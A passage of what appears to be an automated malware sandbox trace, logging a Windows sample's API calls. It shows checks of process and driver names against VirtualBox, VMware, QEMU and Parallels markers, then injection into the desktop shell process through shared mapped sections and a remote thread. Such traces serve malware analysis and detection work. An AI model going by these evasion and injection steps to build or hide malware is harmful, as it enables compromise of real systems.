_SubStr="vmtoolsd.exe") returned 0x0 [0155.641] wcsstr (_Str="at_effort.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.641] wcsstr (_Str="state.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.641] wcsstr (_Str="state.exe", _SubStr="qga.exe") returned 0x0 [0155.641] wcsstr (_Str="state.exe", _SubStr="windanr.exe") returned 0x0 [0155.641] wcsstr (_Str="state.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.641] wcsstr (_Str="state.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.641] wcsstr (_Str="state.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.641] wcsstr (_Str="state.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.641] wcsstr (_Str="four.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.641] wcsstr (_Str="four.exe", _SubStr="qga.exe") returned 0x0 [0155.641] wcsstr (_Str="four.exe", _SubStr="windanr.exe") returned 0x0 [0155.641] wcsstr (_Str="four.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.641] wcsstr (_Str="four.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.641] wcsstr (_Str="four.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.641] wcsstr (_Str="four.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.641] wcsstr (_Str="treatmentabout.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.641] wcsstr (_Str="treatmentabout.exe", _SubStr="qga.exe") returned 0x0 [0155.641] wcsstr (_Str="treatmentabout.exe", _SubStr="windanr.exe") returned 0x0 [0155.641] wcsstr (_Str="treatmentabout.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.641] wcsstr (_Str="treatmentabout.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.641] wcsstr (_Str="treatmentabout.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.641] wcsstr (_Str="treatmentabout.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.641] wcsstr (_Str="treat.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.641] wcsstr (_Str="treat.exe", _SubStr="qga.exe") returned 0x0 [0155.641] wcsstr (_Str="treat.exe", _SubStr="windanr.exe") returned 0x0 [0155.642] wcsstr (_Str="treat.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.642] wcsstr (_Str="treat.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.642] wcsstr (_Str="treat.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.642] wcsstr (_Str="treat.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.642] wcsstr (_Str="quickly_mention_learn.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.642] wcsstr (_Str="quickly_mention_learn.exe", _SubStr="qga.exe") returned 0x0 [0155.642] wcsstr (_Str="quickly_mention_learn.exe", _SubStr="windanr.exe") returned 0x0 [0155.642] wcsstr (_Str="quickly_mention_learn.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.642] wcsstr (_Str="quickly_mention_learn.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.642] wcsstr (_Str="quickly_mention_learn.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.642] wcsstr (_Str="quickly_mention_learn.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.642] wcsstr (_Str="offer_shot.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.642] wcsstr (_Str="offer_shot.exe", _SubStr="qga.exe") returned 0x0 [0155.642] wcsstr (_Str="offer_shot.exe", _SubStr="windanr.exe") returned 0x0 [0155.642] wcsstr (_Str="offer_shot.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.642] wcsstr (_Str="offer_shot.exe", _SubStr="vboxtray.exe") returned 0x0 [0155.642] wcsstr (_Str="offer_shot.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0155.642] wcsstr (_Str="offer_shot.exe", _SubStr="prl_tools.exe") returned 0x0 [0155.642] wcsstr (_Str="total.exe", _SubStr="qemu-ga.exe") returned 0x0 [0155.642] wcsstr (_Str="total.exe", _SubStr="qga.exe") returned 0x0 [0155.642] wcsstr (_Str="total.exe", _SubStr="windanr.exe") returned 0x0 [0155.642] wcsstr (_Str="total.exe", _SubStr="vboxservice.exe") returned 0x0 [0155.643] LocalFree (hMem=0x4149b0) returned 0x0 [0155.643] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x0, Length=0x0, ResultLength=0x18ff5c | out: SystemInformation=0x0, ResultLength=0x18ff5c*=0xbed4) returned 0xc0000004 [0155.645] LocalAlloc (uFlags=0x40, uBytes=0xced4) returned 0x4149b0 [0155.645] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x4149b0, Length=0xced4, ResultLength=0x18ff5c | out: SystemInformation=0x4149b0, ResultLength=0x18ff5c*=0xbed4) returned 0x0 [0155.646] strstr (_Str="ntoskrnl.exe", _SubStr="vmci.s") returned 0x0 [0155.646] strstr (_Str="ntoskrnl.exe", _SubStr="vmusbm") returned 0x0 [0155.646] strstr (_Str="ntoskrnl.exe", _SubStr="vmmous") returned 0x0 [0155.646] strstr (_Str="ntoskrnl.exe", _SubStr="vm3dmp") returned 0x0 [0155.646] strstr (_Str="ntoskrnl.exe", _SubStr="vmrawd") returned 0x0 [0155.646] strstr (_Str="ntoskrnl.exe", _SubStr="vmmemc") returned 0x0 [0155.646] strstr (_Str="ntoskrnl.exe", _SubStr="vboxgu") returned 0x0 [0155.647] strstr (_Str="ntoskrnl.exe", _SubStr="vboxsf") returned 0x0 [0155.647] strstr (_Str="ntoskrnl.exe", _SubStr="vboxmo") returned 0x0 [0155.647] strstr (_Str="ntoskrnl.exe", _SubStr="vboxvi") returned 0x0 [0155.647] strstr (_Str="ntoskrnl.exe", _SubStr="vboxdi") returned 0x0 [0155.647] strstr (_Str="ntoskrnl.exe", _SubStr="vioser") returned 0x0 [0155.647] strstr (_Str="hal.dll", _SubStr="vmci.s") returned 0x0 [0155.647] strstr (_Str="hal.dll", _SubStr="vmusbm") returned 0x0 [0155.647] strstr (_Str="hal.dll", _SubStr="vmmous") returned 0x0 [0155.647] strstr (_Str="hal.dll", _SubStr="vm3dmp") returned 0x0 [0155.647] strstr (_Str="hal.dll", _SubStr="vmrawd") returned 0x0 [0155.647] strstr (_Str="hal.dll", _SubStr="vmmemc") returned 0x0 [0155.647] strstr (_Str="hal.dll", _SubStr="vboxgu") returned 0x0 [0155.647] strstr (_Str="hal.dll", _SubStr="vboxsf") returned 0x0 [0155.647] strstr (_Str="hal.dll", _SubStr="vboxmo") returned 0x0 [0155.647] strstr (_Str="hal.dll", _SubStr="vboxvi") returned 0x0 [0155.647] strstr (_Str="hal.dll", _SubStr="vboxdi") returned 0x0 [0155.647] strstr (_Str="hal.dll", _SubStr="vioser") returned 0x0 [0155.648] strstr (_Str="kdcom.dll", _SubStr="vmci.s") returned 0x0 [0155.648] strstr (_Str="kdcom.dll", _SubStr="vmusbm") returned 0x0 [0155.648] strstr (_Str="kdcom.dll", _SubStr="vmmous") returned 0x0 [0155.648] strstr (_Str="kdcom.dll", _SubStr="vm3dmp") returned 0x0 [0155.648] strstr (_Str="kdcom.dll", _SubStr="vmrawd") returned 0x0 [0155.648] strstr (_Str="kdcom.dll", _SubStr="vmmemc") returned 0x0 [0155.648] strstr (_Str="kdcom.dll", _SubStr="vboxgu") returned 0x0 [0155.648] strstr (_Str="kdcom.dll", _SubStr="vboxsf") returned 0x0 [0155.648] strstr (_Str="kdcom.dll", _SubStr="vboxmo") returned 0x0 [0155.648] strstr (_Str="kdcom.dll", _SubStr="vboxvi") returned 0x0 [0155.648] strstr (_Str="kdcom.dll", _SubStr="vboxdi") returned 0x0 [0155.648] strstr (_Str="kdcom.dll", _SubStr="vioser") returned 0x0 [0155.649] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmci.s") returned 0x0 [0155.649] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmusbm") returned 0x0 [0155.649] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmous") returned 0x0 [0155.649] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vm3dmp") returned 0x0 [0155.649] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmrawd") returned 0x0 [0155.649] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmemc") returned 0x0 [0155.649] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxgu") returned 0x0 [0155.649] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxsf") returned 0x0 [0155.649] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxmo") returned 0x0 [0155.649] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxvi") returned 0x0 [0155.649] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxdi") returned 0x0 [0155.649] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vioser") returned 0x0 [0155.650] strstr (_Str="pshed.dll", _SubStr="vmci.s") returned 0x0 [0155.650] strstr (_Str="pshed.dll", _SubStr="vmusbm") returned 0x0 [0155.650] strstr (_Str="pshed.dll", _SubStr="vmmous") returned 0x0 [0155.650] strstr (_Str="pshed.dll", _SubStr="vm3dmp") returned 0x0 [0155.650] strstr (_Str="pshed.dll", _SubStr="vmrawd") returned 0x0 [0155.650] strstr (_Str="pshed.dll", _SubStr="vmmemc") returned 0x0 [0155.650] strstr (_Str="pshed.dll", _SubStr="vboxgu") returned 0x0 [0155.650] strstr (_Str="pshed.dll", _SubStr="vboxsf") returned 0x0 [0155.650] strstr (_Str="pshed.dll", _SubStr="vboxmo") returned 0x0 [0155.650] strstr (_Str="pshed.dll", _SubStr="vboxvi") returned 0x0 [0155.650] strstr (_Str="pshed.dll", _SubStr="vboxdi") returned 0x0 [0155.650] strstr (_Str="pshed.dll", _SubStr="vioser") returned 0x0 [0155.651] strstr (_Str="clfs.sys", _SubStr="vmci.s") returned 0x0 [0155.651] strstr (_Str="clfs.sys", _SubStr="vmusbm") returned 0x0 [0155.651] strstr (_Str="clfs.sys", _SubStr="vmmous") returned 0x0 [0155.651] strstr (_Str="clfs.sys", _SubStr="vm3dmp") returned 0x0 [0155.651] strstr (_Str="clfs.sys", _SubStr="vmrawd") returned 0x0 [0155.651] strstr (_Str="clfs.sys", _SubStr="vmmemc") returned 0x0 [0155.651] strstr (_Str="clfs.sys", _SubStr="vboxgu") returned 0x0 [0155.651] strstr (_Str="clfs.sys", _SubStr="vboxsf") returned 0x0 [0155.651] strstr (_Str="clfs.sys", _SubStr="vboxmo") returned 0x0 [0155.651] strstr (_Str="clfs.sys", _SubStr="vboxvi") returned 0x0 [0155.651] strstr (_Str="clfs.sys", _SubStr="vboxdi") returned 0x0 [0155.651] strstr (_Str="clfs.sys", _SubStr="vioser") returned 0x0 [0155.652] strstr (_Str="ci.dll", _SubStr="vmci.s") returned 0x0 [0155.652] strstr (_Str="ci.dll", _SubStr="vmusbm") returned 0x0 [0155.652] strstr (_Str="ci.dll", _SubStr="vmmous") returned 0x0 [0155.652] strstr (_Str="ci.dll", _SubStr="vm3dmp") returned 0x0 [0155.652] strstr (_Str="ci.dll", _SubStr="vmrawd") returned 0x0 [0155.652] strstr (_Str="ci.dll", _SubStr="vmmemc") returned 0x0 [0155.652] strstr (_Str="ci.dll", _SubStr="vboxgu") returned 0x0 [0155.652] strstr (_Str="ci.dll", _SubStr="vboxsf") returned 0x0 [0155.652] strstr (_Str="ci.dll", _SubStr="vboxmo") returned 0x0 [0155.652] strstr (_Str="ci.dll", _SubStr="vboxvi") returned 0x0 [0155.652] strstr (_Str="ci.dll", _SubStr="vboxdi") returned 0x0 [0155.652] strstr (_Str="ci.dll", _SubStr="vioser") returned 0x0 [0155.653] strstr (_Str="wdf01000.sys", _SubStr="vmci.s") returned 0x0 [0155.653] strstr (_Str="wdf01000.sys", _SubStr="vmusbm") returned 0x0 [0155.653] strstr (_Str="wdf01000.sys", _SubStr="vmmous") returned 0x0 [0155.653] strstr (_Str="wdf01000.sys", _SubStr="vm3dmp") returned 0x0 [0155.653] strstr (_Str="wdf01000.sys", _SubStr="vmrawd") returned 0x0 [0155.653] strstr (_Str="wdf01000.sys", _SubStr="vmmemc") returned 0x0 [0155.653] strstr (_Str="wdf01000.sys", _SubStr="vboxgu") returned 0x0 [0155.653] strstr (_Str="wdf01000.sys", _SubStr="vboxsf") returned 0x0 [0155.653] strstr (_Str="wdf01000.sys", _SubStr="vboxmo") returned 0x0 [0155.653] strstr (_Str="wdf01000.sys", _SubStr="vboxvi") returned 0x0 [0155.653] strstr (_Str="wdf01000.sys", _SubStr="vboxdi") returned 0x0 [0155.653] strstr (_Str="wdf01000.sys", _SubStr="vioser") returned 0x0 [0155.654] strstr (_Str="wdfldr.sys", _SubStr="vmci.s") returned 0x0 [0155.654] strstr (_Str="wdfldr.sys", _SubStr="vmusbm") returned 0x0 [0155.654] strstr (_Str="wdfldr.sys", _SubStr="vmmous") returned 0x0 [0155.654] strstr (_Str="wdfldr.sys", _SubStr="vm3dmp") returned 0x0 [0155.654] strstr (_Str="wdfldr.sys", _SubStr="vmrawd") returned 0x0 [0155.654] strstr (_Str="wdfldr.sys", _SubStr="vmmemc") returned 0x0 [0155.654] strstr (_Str="wdfldr.sys", _SubStr="vboxgu") returned 0x0 [0155.654] strstr (_Str="wdfldr.sys", _SubStr="vboxsf") returned 0x0 [0155.654] strstr (_Str="wdfldr.sys", _SubStr="vboxmo") returned 0x0 [0155.654] strstr (_Str="wdfldr.sys", _SubStr="vboxvi") returned 0x0 [0155.654] strstr (_Str="wdfldr.sys", _SubStr="vboxdi") returned 0x0 [0155.654] strstr (_Str="wdfldr.sys", _SubStr="vioser") returned 0x0 [0155.655] strstr (_Str="acpi.sys", _SubStr="vmci.s") returned 0x0 [0155.655] strstr (_Str="acpi.sys", _SubStr="vmusbm") returned 0x0 [0155.655] strstr (_Str="acpi.sys", _SubStr="vmmous") returned 0x0 [0155.655] strstr (_Str="acpi.sys", _SubStr="vm3dmp") returned 0x0 [0155.655] strstr (_Str="acpi.sys", _SubStr="vmrawd") returned 0x0 [0155.655] strstr (_Str="acpi.sys", _SubStr="vmmemc") returned 0x0 [0155.655] strstr (_Str="acpi.sys", _SubStr="vboxgu") returned 0x0 [0155.655] strstr (_Str="acpi.sys", _SubStr="vboxsf") returned 0x0 [0155.655] strstr (_Str="acpi.sys", _SubStr="vboxmo") returned 0x0 [0155.655] strstr (_Str="acpi.sys", _SubStr="vboxvi") returned 0x0 [0155.655] strstr (_Str="acpi.sys", _SubStr="vboxdi") returned 0x0 [0155.655] strstr (_Str="acpi.sys", _SubStr="vioser") returned 0x0 [0155.656] strstr (_Str="wmilib.sys", _SubStr="vmci.s") returned 0x0 [0155.656] strstr (_Str="wmilib.sys", _SubStr="vmusbm") returned 0x0 [0155.656] strstr (_Str="wmilib.sys", _SubStr="vmmous") returned 0x0 [0155.656] strstr (_Str="wmilib.sys", _SubStr="vm3dmp") returned 0x0 [0155.656] strstr (_Str="wmilib.sys", _SubStr="vmrawd") returned 0x0 [0155.656] strstr (_Str="wmilib.sys", _SubStr="vmmemc") returned 0x0 [0155.656] strstr (_Str="wmilib.sys", _SubStr="vboxgu") returned 0x0 [0155.656] strstr (_Str="wmilib.sys", _SubStr="vboxsf") returned 0x0 [0155.656] strstr (_Str="wmilib.sys", _SubStr="vboxmo") returned 0x0 [0155.656] strstr (_Str="wmilib.sys", _SubStr="vboxvi") returned 0x0 [0155.656] strstr (_Str="wmilib.sys", _SubStr="vboxdi") returned 0x0 [0155.656] strstr (_Str="wmilib.sys", _SubStr="vioser") returned 0x0 [0155.657] strstr (_Str="msisadrv.sys", _SubStr="vmci.s") returned 0x0 [0155.657] strstr (_Str="msisadrv.sys", _SubStr="vmusbm") returned 0x0 [0155.657] strstr (_Str="msisadrv.sys", _SubStr="vmmous") returned 0x0 [0155.657] strstr (_Str="msisadrv.sys", _SubStr="vm3dmp") returned 0x0 [0155.657] strstr (_Str="msisadrv.sys", _SubStr="vmrawd") returned 0x0 [0155.657] strstr (_Str="msisadrv.sys", _SubStr="vmmemc") returned 0x0 [0155.657] strstr (_Str="msisadrv.sys", _SubStr="vboxgu") returned 0x0 [0155.657] strstr (_Str="msisadrv.sys", _SubStr="vboxsf") returned 0x0 [0155.657] strstr (_Str="msisadrv.sys", _SubStr="vboxmo") returned 0x0 [0155.657] strstr (_Str="msisadrv.sys", _SubStr="vboxvi") returned 0x0 [0155.657] strstr (_Str="msisadrv.sys", _SubStr="vboxdi") returned 0x0 [0155.657] strstr (_Str="msisadrv.sys", _SubStr="vioser") returned 0x0 [0155.657] strstr (_Str="pci.sys", _SubStr="vmci.s") returned 0x0 [0155.658] strstr (_Str="pci.sys", _SubStr="vmusbm") returned 0x0 [0155.658] strstr (_Str="pci.sys", _SubStr="vmmous") returned 0x0 [0155.658] strstr (_Str="pci.sys", _SubStr="vm3dmp") returned 0x0 [0155.658] strstr (_Str="pci.sys", _SubStr="vmrawd") returned 0x0 [0155.658] strstr (_Str="pci.sys", _SubStr="vmmemc") returned 0x0 [0155.658] strstr (_Str="pci.sys", _SubStr="vboxgu") returned 0x0 [0155.658] strstr (_Str="pci.sys", _SubStr="vboxsf") returned 0x0 [0155.658] strstr (_Str="pci.sys", _SubStr="vboxmo") returned 0x0 [0155.658] strstr (_Str="pci.sys", _SubStr="vboxvi") returned 0x0 [0155.658] strstr (_Str="pci.sys", _SubStr="vboxdi") returned 0x0 [0155.658] strstr (_Str="pci.sys", _SubStr="vioser") returned 0x0 [0155.658] strstr (_Str="vdrvroot.sys", _SubStr="vmci.s") returned 0x0 [0155.658] strstr (_Str="vdrvroot.sys", _SubStr="vmusbm") returned 0x0 [0155.658] strstr (_Str="vdrvroot.sys", _SubStr="vmmous") returned 0x0 [0155.658] strstr (_Str="vdrvroot.sys", _SubStr="vm3dmp") returned 0x0 [0155.658] strstr (_Str="vdrvroot.sys", _SubStr="vmrawd") returned 0x0 [0155.658] strstr (_Str="vdrvroot.sys", _SubStr="vmmemc") returned 0x0 [0155.658] strstr (_Str="vdrvroot.sys", _SubStr="vboxgu") returned 0x0 [0155.658] strstr (_Str="vdrvroot.sys", _SubStr="vboxsf") returned 0x0 [0155.658] strstr (_Str="vdrvroot.sys", _SubStr="vboxmo") returned 0x0 [0155.659] strstr (_Str="vdrvroot.sys", _SubStr="vboxvi") returned 0x0 [0155.659] strstr (_Str="vdrvroot.sys", _SubStr="vboxdi") returned 0x0 [0155.659] strstr (_Str="vdrvroot.sys", _SubStr="vioser") returned 0x0 [0155.659] strstr (_Str="partmgr.sys", _SubStr="vmci.s") returned 0x0 [0155.659] strstr (_Str="partmgr.sys", _SubStr="vmusbm") returned 0x0 [0155.659] strstr (_Str="partmgr.sys", _SubStr="vmmous") returned 0x0 [0155.659] strstr (_Str="partmgr.sys", _SubStr="vm3dmp") returned 0x0 [0155.659] strstr (_Str="partmgr.sys", _SubStr="vmrawd") returned 0x0 [0155.659] strstr (_Str="partmgr.sys", _SubStr="vmmemc") returned 0x0 [0155.659] strstr (_Str="partmgr.sys", _SubStr="vboxgu") returned 0x0 [0155.659] strstr (_Str="partmgr.sys", _SubStr="vboxsf") returned 0x0 [0155.659] strstr (_Str="partmgr.sys", _SubStr="vboxmo") returned 0x0 [0155.659] strstr (_Str="partmgr.sys", _SubStr="vboxvi") returned 0x0 [0155.659] strstr (_Str="partmgr.sys", _SubStr="vboxdi") returned 0x0 [0155.659] strstr (_Str="partmgr.sys", _SubStr="vioser") returned 0x0 [0155.720] strstr (_Str="volmgr.sys", _SubStr="vmci.s") returned 0x0 [0155.720] strstr (_Str="volmgr.sys", _SubStr="vmusbm") returned 0x0 [0155.720] strstr (_Str="volmgr.sys", _SubStr="vmmous") returned 0x0 [0155.720] strstr (_Str="volmgr.sys", _SubStr="vm3dmp") returned 0x0 [0155.720] strstr (_Str="volmgr.sys", _SubStr="vmrawd") returned 0x0 [0155.720] strstr (_Str="volmgr.sys", _SubStr="vmmemc") returned 0x0 [0155.721] strstr (_Str="volmgr.sys", _SubStr="vboxgu") returned 0x0 [0155.721] strstr (_Str="volmgr.sys", _SubStr="vboxsf") returned 0x0 [0155.721] strstr (_Str="volmgr.sys", _SubStr="vboxmo") returned 0x0 [0155.721] strstr (_Str="volmgr.sys", _SubStr="vboxvi") returned 0x0 [0155.721] strstr (_Str="volmgr.sys", _SubStr="vboxdi") returned 0x0 [0155.721] strstr (_Str="volmgr.sys", _SubStr="vioser") returned 0x0 [0155.721] strstr (_Str="volmgrx.sys", _SubStr="vmci.s") returned 0x0 [0155.721] strstr (_Str="volmgrx.sys", _SubStr="vmusbm") returned 0x0 [0155.721] strstr (_Str="volmgrx.sys", _SubStr="vmmous") returned 0x0 [0155.721] strstr (_Str="volmgrx.sys", _SubStr="vm3dmp") returned 0x0 [0155.721] strstr (_Str="volmgrx.sys", _SubStr="vmrawd") returned 0x0 [0155.721] strstr (_Str="volmgrx.sys", _SubStr="vmmemc") returned 0x0 [0155.721] strstr (_Str="volmgrx.sys", _SubStr="vboxgu") returned 0x0 [0155.721] strstr (_Str="volmgrx.sys", _SubStr="vboxsf") returned 0x0 [0155.721] strstr (_Str="volmgrx.sys", _SubStr="vboxmo") returned 0x0 [0155.721] strstr (_Str="volmgrx.sys", _SubStr="vboxvi") returned 0x0 [0155.721] strstr (_Str="volmgrx.sys", _SubStr="vboxdi") returned 0x0 [0155.721] strstr (_Str="volmgrx.sys", _SubStr="vioser") returned 0x0 [0155.722] strstr (_Str="mountmgr.sys", _SubStr="vmci.s") returned 0x0 [0155.722] strstr (_Str="mountmgr.sys", _SubStr="vmusbm") returned 0x0 [0155.722] strstr (_Str="mountmgr.sys", _SubStr="vmmous") returned 0x0 [0155.722] strstr (_Str="mountmgr.sys", _SubStr="vm3dmp") returned 0x0 [0155.722] strstr (_Str="mountmgr.sys", _SubStr="vmrawd") returned 0x0 [0155.722] strstr (_Str="mountmgr.sys", _SubStr="vmmemc") returned 0x0 [0155.722] strstr (_Str="mountmgr.sys", _SubStr="vboxgu") returned 0x0 [0155.722] strstr (_Str="mountmgr.sys", _SubStr="vboxsf") returned 0x0 [0155.722] strstr (_Str="mountmgr.sys", _SubStr="vboxmo") returned 0x0 [0155.722] strstr (_Str="mountmgr.sys", _SubStr="vboxvi") returned 0x0 [0155.722] strstr (_Str="mountmgr.sys", _SubStr="vboxdi") returned 0x0 [0155.722] strstr (_Str="mountmgr.sys", _SubStr="vioser") returned 0x0 [0155.722] strstr (_Str="atapi.sys", _SubStr="vmci.s") returned 0x0 [0155.722] strstr (_Str="atapi.sys", _SubStr="vmusbm") returned 0x0 [0155.722] strstr (_Str="atapi.sys", _SubStr="vmmous") returned 0x0 [0155.722] strstr (_Str="atapi.sys", _SubStr="vm3dmp") returned 0x0 [0155.722] strstr (_Str="atapi.sys", _SubStr="vmrawd") returned 0x0 [0155.723] strstr (_Str="atapi.sys", _SubStr="vmmemc") returned 0x0 [0155.723] strstr (_Str="atapi.sys", _SubStr="vboxgu") returned 0x0 [0155.723] strstr (_Str="atapi.sys", _SubStr="vboxsf") returned 0x0 [0155.723] strstr (_Str="atapi.sys", _SubStr="vboxmo") returned 0x0 [0155.723] strstr (_Str="atapi.sys", _SubStr="vboxvi") returned 0x0 [0155.723] strstr (_Str="atapi.sys", _SubStr="vboxdi") returned 0x0 [0155.723] strstr (_Str="atapi.sys", _SubStr="vioser") returned 0x0 [0155.723] strstr (_Str="ataport.sys", _SubStr="vmci.s") returned 0x0 [0155.723] strstr (_Str="ataport.sys", _SubStr="vmusbm") returned 0x0 [0155.723] strstr (_Str="ataport.sys", _SubStr="vmmous") returned 0x0 [0155.723] strstr (_Str="ataport.sys", _SubStr="vm3dmp") returned 0x0 [0155.723] strstr (_Str="ataport.sys", _SubStr="vmrawd") returned 0x0 [0155.723] strstr (_Str="ataport.sys", _SubStr="vmmemc") returned 0x0 [0155.723] strstr (_Str="ataport.sys", _SubStr="vboxgu") returned 0x0 [0155.723] strstr (_Str="ataport.sys", _SubStr="vboxsf") returned 0x0 [0155.723] strstr (_Str="ataport.sys", _SubStr="vboxmo") returned 0x0 [0155.723] strstr (_Str="ataport.sys", _SubStr="vboxvi") returned 0x0 [0155.723] strstr (_Str="ataport.sys", _SubStr="vboxdi") returned 0x0 [0155.723] strstr (_Str="ataport.sys", _SubStr="vioser") returned 0x0 [0155.724] strstr (_Str="msahci.sys", _SubStr="vmci.s") returned 0x0 [0155.724] strstr (_Str="msahci.sys", _SubStr="vmusbm") returned 0x0 [0155.724] strstr (_Str="msahci.sys", _SubStr="vmmous") returned 0x0 [0155.724] strstr (_Str="msahci.sys", _SubStr="vm3dmp") returned 0x0 [0155.724] strstr (_Str="msahci.sys", _SubStr="vmrawd") returned 0x0 [0155.724] strstr (_Str="msahci.sys", _SubStr="vmmemc") returned 0x0 [0155.724] strstr (_Str="msahci.sys", _SubStr="vboxgu") returned 0x0 [0155.724] strstr (_Str="msahci.sys", _SubStr="vboxsf") returned 0x0 [0155.724] strstr (_Str="msahci.sys", _SubStr="vboxmo") returned 0x0 [0155.725] LocalFree (hMem=0x4149b0) returned 0x0 [0155.725] Sleep (dwMilliseconds=0x1388) [0160.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18ff24*=0x0, ZeroBits=0x0, RegionSize=0x18ff2c*=0x5200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x18ff24*=0x1a0000, RegionSize=0x18ff2c*=0x6000) returned 0x0 [0160.781] GetShellWindow () returned 0x100e6 [0160.781] GetWindowThreadProcessId (in: hWnd=0x100e6, lpdwProcessId=0x18fed0 | out: lpdwProcessId=0x18fed0) returned 0x13c [0160.782] NtOpenProcess (in: ProcessHandle=0x18ff20, DesiredAccess=0x40, ObjectAttributes=0x18ff08*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x18ff00*(UniqueProcess=0x390, UniqueThread=0x0) | out: ProcessHandle=0x18ff20*=0x80) returned 0x0 [0160.782] NtDuplicateObject (in: SourceProcessHandle=0x80, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x18ff24, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x18ff24*=0x84) returned 0x0 [0160.782] NtCreateSection (in: SectionHandle=0x18fedc, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x18fee0, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18fedc*=0x88) returned 0x0 [0160.782] NtMapViewOfSection (in: SectionHandle=0x88, ProcessHandle=0xffffffff, BaseAddress=0x18feec*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18feec*=0x1b0000, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000) returned 0x0 [0160.783] NtMapViewOfSection (in: SectionHandle=0x88, ProcessHandle=0x84, BaseAddress=0x18fef4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18fef4*=0x2580000, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000) returned 0x0 [0160.784] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b0000, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr")) returned 0x2a [0160.784] NtCreateSection (in: SectionHandle=0x18fed8, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x18fee0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18fed8*=0x8c) returned 0x0 [0160.784] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0xffffffff, BaseAddress=0x18fee8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x15200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18fee8*=0x1e0000, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000) returned 0x0 [0160.784] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0x84, BaseAddress=0x18fef0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x18fef0*=0x2750000, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000) returned 0x0 [0160.789] RtlCreateUserThread (in: ProcessHandle=0x84, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x2751930, Parameter=0x2580000, ThreadHandle=0x18fe30*=0x77a16c9a77a16c93, ClientId=0x0 | out: ThreadHandle=0x18fe30*=0x90, ClientId=0x0) returned 0x0 [0161.219] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xdb4d000" os_pid = "0x2c0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = 